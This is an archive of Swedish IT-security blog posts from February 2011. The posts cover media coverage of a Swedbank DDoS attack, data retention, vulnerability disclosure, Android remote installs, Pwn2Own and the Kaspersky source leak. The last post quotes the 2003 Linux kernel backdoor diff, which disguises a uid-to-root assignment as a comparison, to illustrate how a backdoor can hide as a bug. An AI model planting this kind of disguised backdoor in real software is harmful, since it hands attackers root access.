onsdag 23 februari 2011

Swedbank försökskanin för superhackare?

Dagens Nyheter har idag en artikel med rubriken "Swedbank utsatt för superhackare". Underlaget till artikeln kommer från Wikileaks och diplomatdokumenten, men rubriken kan man misstänka kommer från DN själva. Utifrån innehållet i artikeln är det absolut löjliga rubriker och slutsatser som dras.

Swedbank har tidigare visat tecken på sämre fungerande säkerhet än flera andra svenska banker, men en DDoS-attack kan knappast sägas vara varken sofistikerad eller ge något relevant underlag för hur DDoS-angrepp mot andra banker skulle arta sig.

Tyvärr har flera andra tidningar och även TT snappat upp det som skrivits och gör rubriker av det. Det är synd, för DN har tidigare varit ganska bra på sin rapportering kring IT-säkerhet. Förvisso är det flera olika journalister och ämnen, men visst ska det väl vara meningen att en tidning ska hålla en jämn standard oavsett vilken journalist som skrivit artikeln, eller vilket ämne den är om? Den här artikeln har snarare drag av sensationsjournalistik och bristande insikt.

Det finns en story i det ursprungliga dokumentet, men den är inte vad som skrivs om i de svenska tidningar idag...

måndag 21 februari 2011

En glimt av USA:s cyberkrigsföring

Arstechnica har tack vare HBGary-hacket en bra artikel uppe som ger en glimt in i var USA befinner sig rent tekniskt i frågan om cyberkrigsföring. Cyberkrig kanske inte är rätta ordet för stunden, men det framgår tydligt att riktade angrepp är en strategi som tillämpas.

FBI, Datalagringsdirektivet och webbmail

En av fördelarna med att ha skrivit ner sina tankar på en blogg är att man senare kan säga "Vad var det jag sa?" och hänvisa till tidigare inlägg. Idag är ytterligare en sådan dag.

En representant från FBI har nu vittnat för den amerikanska kongressen om deras dåliga möjligheter att lyssna av webbmail-trafiken. Det är precis en sådan teknisk oklarhet jag nämnde i mitt inlägg om datalagringsdirektivets mikro- och makroperspektiv.

Världen behöver dock inte vara svart eller vit. Det kan finnas en gråskala. Och bara för att man inte kan logga och lyssna av ALLA meddelanden betyder inte det att det saknas vinst i att lyssna av VISSA meddelanden. Det viktiga är att det är ett medvetet beslut.

Den utredning om datalagringsdirektivet som gjorts har dock inte uppmärksammat det här. Det gör att vi riskerar att det sitter personer i riksdagen som har en orealistisk bild av
datalagringsdirektivet. Och att beslut därför blir fattat på felaktiga grunder.

Jag skulle väldigt gärna se att någon gjorde en ordentlig analys av situationen. Några obehandlade frågor jag vill ha svar på:
  • Hur många fler brott kommer lösas med hjälp av datalagringsdirektivet?
  • Hur mycket snabbare löser polisen de brott som redan löses?
  • Hur mycket pengar kan polisen spara?
  • Vilka meddelanden väntar man sig lagra?
  • Vilka aktörer väntar man sig aktivt kommer undgå lagring?
  • Hur länge tror man att datalagringsdirektivet kommer vara effektiv i sin föreslagna form?
... det vill säga, när ska vi förvänta oss att det kommer function creep för datalagringsdirektivet även inom EU/Sverige?

torsdag 17 februari 2011

Jönköping: Knarkare misstogs vara spioner

Jag är ledsen för att behöva peka finger, men det här är bara för roligt.
För tre veckor sedan upptäcktes en okänd dator kopplad till Jönköpings flygplats intranät. Både flygplatsledning och polis trodde att det kunde handla om affärsspionage, och drog igång en utredning.

Men på tisdagen avslöjades sanningen. "Spiondatorn" vara ett fullt normalt samarbete mellan flyplatsens IT-avdelning och det lokala flygbolaget Flyglinjen.
Alltså, efter tre veckor, kommer man fram till att datorn faktiskt var ditplacerad av egna IT-avdelning. Hörde jag någon säga knarkarkvart?

Påminner för övrigt om incidenten på Island förra månaden. Kanske var det på grund av det som någon fick för sig att anmäla datorn?

tisdag 15 februari 2011

MSB hakar på och utreder halkriskens ekonomi

Ni kommer väl ihåg mitt blogginlägg om att halkrisken är fortsatt stor på grund av ekonomin?

Idag har MSB tagit i frågan och meddelat att de kommer göra en utredning.

Från en artikel i DN:
Jan Schyllander säger dock att sjukvårdskostnaderna för olyckor skulle sjunka om kommunerna sandade mer.

– Ja, men det är ju en plånbok som hanterar snö och skottning och en annan plånbok som betalar sjukvårdskostnaderna, säger Jan Schyllander.
Mitt resonemang från januari står naturligtvis fast. För att det ska ske förbättring i slutändan måste antingen ekonomin vridas så att samma plånbok får betala, eller så behöver en tydligare kravställning med uppföljning och politiska konsekvenser införas. Vad som håller på att hända nu är att MSB ger underlag för det här.

Det är kritiskt att någon högre upp sedan tar resultatet från MSBs arbete och stuvar om i författningen.

fredag 11 februari 2011

Håll tyst eller bli polisanmäld

Jag har sagt det förut och kommer fortsätta säga det: hittar du någon säkerhetsbrist på en sajt så gör du klokt i att hålla tyst om det.

Nu senast handlar det om eHarmony.com, en dejtingsajt som fick höra från en man som kallar sig "Russo", att de haft en sårbarhet på sin sajt. Och i nästa menings gavs ett "konsulterbjudande" om att få det åtgärdat. Reaktion från eHarmony:
“Russo’s fraudulent efforts to obtain money from us are most disturbing,” Essas said. “As such, we are exploring our legal rights and remedies as well."
Två sidor med helt olika verkligheter möts.

För att förstå lite bättre hur eHarmony känner sig kan du tänka dig in i situationen att en man i motorcykelkläder kommer till din butik, förklarar för dig hur lätt olyckor kan hända, men också erbjuder försäkring mot dessa olyckor. "Helt utan självrisk ser vi till att alla dina prylar kommer tillbaka och den skyldige betalar dina skador, om någon olycka skulle hända. Allt du behöver göra är att betala en premie på 5% av din omsättning."


Yeah, that's right. Du riskerar att bli polisanmäld för utpressning. Eller om vi återgår till vår verklighet med IT-säkerhet, så kan du bli polisanmäld för dataintrång. Sådant har hänt i Sverige, med både fällande och friande utfall. Normalt länkar jag till mer info, men av respekt för de drabbade vill jag inte uppmärksamma några enskilda fall.

Vad som är viktigt att komma ihåg är:

  1. Gör inga säkerhetstester utan tillåtelse. Ägaren kan omöjligt veta om dina intentioner är goda eller onda. Du riskerar polisanmälan.
  2. Snubblar du över något har du tre val:
    1. Håll tyst om det
    2. Rapportera det genom tredje part
    3. Rapportera det direkt
För egen del så brukar jag som privatperson hamna på att hålla tyst om det, men det har förekommit ett par gånger att jag rapporterat det direkt då jag varit säker på att ingenting har kunnat misstolkas (ren rapportering efter normalt användande, inte ett ord om åtgärder).

I min yrkesroll är det regelmässigt att jag rapporterar till uppdragsgivaren, men inte någon annan såvida inte uppdragsgivaren betalar för det. Det finns inget intresse för min arbetsgivare att min betalda tid istället ska bli obetald och användas till att stångas med någon leverantör som inte vill åtgärda. Tråkigt, men så fungerar det. Hur min uppdragsgivare sedan använder resultaten från de testerna? Säg det... jag bedömer NYTimes uppgifter om att Stuxnet kom till delvis genom resultat från en helt annan övning, som fullt möjliga.

tisdag 8 februari 2011

Jag äger din Android-telefon

... nja, kanske inte jag som snäll IT-säkerhetskonsult. Men, förra veckan sparkade Google upp dörrarna för att andra kommer göra det. Nya Android Market ger nämligen möjlighet att installera och köra kod på din Gmail-anslutna telefon!

Inga varningar, inga frågor... kommer någon över ditt gmail-konto är telefonen rökt. Och ja, det gäller även apps-konton.

Riktigt, riktigt dålig idé. Tänk bara vilka möjligheter det erbjuder botnätet ZeuS som redan har mjukvara till telefoner för att snappa upp SMS för tvåfaktorsautentisering.









= Kodexekvering


Nu räknar åtminstone jag dagarna tills den här funktionen ändras eller tas bort. Också intressant att veta att Google har en så enkel möjlighet att köra kod på din telefon. Tänk vad det kan göra för intresserade parter (tänk: polis, underrättelsetjänst).

fredag 4 februari 2011

Google ger $20.000 extra till den som knäcker Chrome

Om ungefär en månad börjar säkerhetskonferensen CanSecWest där även tävlingen Pwn2Own kommer gå av stapeln. Pwn2Own är en tävling där deltagarna får ge sig på fullt patchade versioner av exempel de fyra stora browsrarna (IE, Firefox, Safari, Chrome). Det handlar alltså om att ha skrivit en 0-day. Den som först lyckas, får en prissumma på $10,000 + den hårdvara som mjukvaran körde på. Därav namnet Pwn2Own.

Förra året var det ingen som lyckades knäcka Chrome, något som uppmärksammade av bland annat mig då jag skrev presentationen av våra invited speakers till OWASP AppSec Research 2010.

Som jag skrev för några veckor sedan anser jag det vara mycket bra att Google ger tydliga ekonomiska incitament för att Chrome ska säkerhetstestas och buggar skall rapporteras till dem. Däremot när Google nu skjuter till $20.000 extra för den här specifika tävlingen är jag inte så säker på att det är en bra idé.

Anledningen till att det kan vara en dålig idé hittar man i tidigare års Pwn2Own. Vinnare för Safari har nämligen alltid (2008,2009,2010) varit Charlie Miller. Efter att ha kammat hem vinsten andra året berättade han i en intervju att sårbarheten han utnyttjat hade han hittat redan inför tävlingen 2008. Men eftersom han inte fick några extra pengar för den 2008, hade han istället sparat på den. Efter vinsten 2010 så tillkännagav han att han satt på inte mindre än 20 sårbarheter som han inte rapporterade. Det kunde man ana redan i intervjun 2009, då Charlie Miller propagerade för kampanjen "No More Free Bugs".

Så... är det verkligen så smart av Google att det erbjuds totalt $30,000 för något Google så sent som i januari bara betalade $3133,7 för? Risken blir överhängande att istället för att rapportera in buggarna när de hittas, sparar man på dem till ett tillfälle då de ger mer. Och under tiden ligger sårbarheterna kvar... Å andra sidan, en gång om året kan Google räkna med att göra storslam och suga upp samtliga kritiska buggar någon hittat. Och för $30.000 kommer deras webbläsare garanterat få all testning som finns tillgänglig. Snacka om att rita en måltavla!

onsdag 2 februari 2011

Fortifikationsverkets använder FUD, men kanske är det berättigat?

Idag har många tidningar en TT-artikel med titeln "Jätteaffärer förlorade på IT-läckor". Tvärtemot vad rubriken antyder har man NOLL(!) fall att peka på. Vilka jätteaffärer pratar de om egentligen?

Sådana ogrundade påståenden ges ofta beteckningen FUD - Fear, Uncertainty, Doubt. Faktum är att det inte finns några offentliga fall där man fastslagit att tillvägagångssättet har varit som artikeln beskriver. Men... det är en spektakulär rubrik för något som vi faktiskt bör ta på allvar.

Exakt scenariot med underrättelsetjänster som stjäl industrihemligheter tog jag upp i ett tidigare blogginlägg. Till det bör också läggas den undersökning som publicerades för några veckor sedan, där det kom fram att så mycket som var femte svensk myndighet har sin e-post i utlandet. Det är inte bra, och det är klent att det inte finns några regler om vad svenska myndigheter får lägga utomlands och inte. Jag har själv jobbat med säkerhetsmedvetna myndigheter där ägarfrågan på outsourcade tjänster har varit viktig nog för att man aktivt valt att sluta köpa tjänster när ägandet gick utomlands, men det är bara en av många. Uppenbarligen är det flera som inte har ett sådant högt säkerhetsmedvetande.

Vill man läsa en bra artikel med Fortifikationsverkets utgångspunkt ska man idag inte läsa TT-artikeln, utan istället gå till SvD som har ett par utsökta artiklar i ämnet. Jag rekommenderar naturligtvis också allt jag bloggat om säkerhet i molnet :)

tisdag 1 februari 2011

Kaspersky källkod ute på vift

Källkoden till Kaspersky Internet Security skvalpar runt ute på Internet. Enligt Kaspersky själva har den gjort så sedan November. Enligt rapporter är det en f.d. missnöjd anställd som stal koden i början av 2008, som han sedan försökte sälja på svarta marknaden.

Vilka skulle vara intresserade av att köpa kod? Förmodligen virusmakare som vill veta exakt hur de ska skriva sina virus för att de ska undgå upptäckt. Skulle de även vara intresserade av att känna till en planterad bakdörr i Kaspersky? Kanske. Men det skulle vara svårare för en opportunist att plantera en snygg bakdörr och skulle vara förknippat med större risk. Att kopiera ut kod är något som många bolag helt saknar spårbarhet för, medan det för incheckning av kod sannolikt finns loggar som bevaras i flera år.

Flera av de bakdörrar som har kommit i ljuset har varit lite klumpigt skrivna och ganska uppenbara. Men en bakdörr kan också vara elegant dold som en sårbarhet, som bara är en i mängden om den upptäcks... På det här området är det självfallet sämre med exempel eftersom vi sällan kan veta om det fanns avsikt eller inte. Det förekommer ibland spekulationer, men det enda exemplet vi är säkra på är då Linux kärnan utsattes för ett backdoor-försök år 2003. Följande ändring smögs då in:
--- GOOD        2003-11-05 13:46:44.000000000 -0800
+++ BAD 2003-11-05 13:46:53.000000000 -0800
@@ -1111,6 +1111,8 @@
schedule();
goto repeat;
}
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
retval = -ECHILD;
end_wait4:
current->state = TASK_RUNNING;

.. men själva ändringen utlöste problem eftersom incheckningen inte hade skett på standardsätt. Det hela tycks ha upptäckts tack vare ett vaket och medvetet open source community.

Som jag skrev igår så har just open source ofta gynnsamma förutsättningar när det kommer till att skydda sig mot säkerhetshot. Samtidigt har man en större utsatthet när kod accepteras från diverse håll. Om det gör open source säkrare eller inte... jag låter den frågan vara, för den är egentligen lika ointressant som vad som är säkrast; PC eller Mac? Det handlar inte om några absoluta siffror, det handlar om hot och risk - något som kan variera väsentligt beroende på verksamhet.

Prova tanken att den Kaspersky-anställde istället för att bara ha stulit kod, istället planterat en subtil bakdörr i den. När skulle den hittats? (och vilka skulle betala för att känna till bakdörren? skulle någon betala för att den alls skulle planteras dit? varför? hur mycket?)